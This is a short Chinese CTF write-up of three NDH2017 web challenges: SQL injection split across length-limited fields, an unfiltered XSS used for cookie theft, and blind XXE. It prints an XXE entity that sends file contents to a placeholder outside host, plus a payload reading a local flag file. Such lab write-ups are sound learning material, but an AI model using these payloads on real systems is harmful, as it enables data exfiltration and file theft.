NDH2017-Web-Writeup

尴尬==假期休息就没做题,等到想做的时候队友都做完了,题不算难,就写下自己做的几个题的过程:


Divide and rule

题目很明了,serach那里有注入,然后应该是可以注到user跟pass,然后在login处登录:
测试的时候发现每个输入框有长度限制,于是可以利用拼接的方式达到注入的目的XD:

屏幕快照 2017-04-02 下午12.52.57.png

但是有一点比较恶心,就是限制长度之后...感觉只能去猜表明列名了...
这里倒比较好猜,列名即是users,字段名经过猜测之后发现是login&password:
屏幕快照 2017-04-02 下午1.16.57.png

然后md5破解进去登录拿到flag:


Purple Posse Market

职业病犯了==感觉想抓人...
一个没有丝毫过滤的xss==
xss平台或者自己vps上简单写一个获取cookie的js脚本就OK,没截图就不放了...


No Pain No Gain

一个blindXXE的题目:
一开始还以为是个啥洞,最后想想才75分,应该是个xxe没跑了。

在vps上放一个xml文件:

<!ENTITY % all "<!ENTITY % send SYSTEM 'http://xxxx:9000/?file=%file;'>">  

然后flag在/home/下...
又是没截图...

赛后发现自己做的其实麻烦了,主要是因为当时自己的xxe写法出了点小问题...当时只是在xml内定义了,在外面却忘记改了名字导致没成功><

<!DOCTYPE data [ <!ENTITY test SYSTEM "file:///home/flag/flag" > ]>
id,name,email
1,&test;,[email protected]

OK:
屏幕快照 2017-04-03 上午2.22.03.png


事实告诉我们,做题时候要随手截图QAQ


为您推荐了相关的技术文章:

  1. unserialize() 实战之 vBulletin 5.x.x 远程代码执行
  2. 记一次ThinkPHP源码审计
  3. 胖哈勃杯第十三届CUIT校赛官方Writeup
  4. S2-017重现过程
  5. 当 PassiveDNS 遇到泛解析 | 岚光

原文链接: www.venenof.com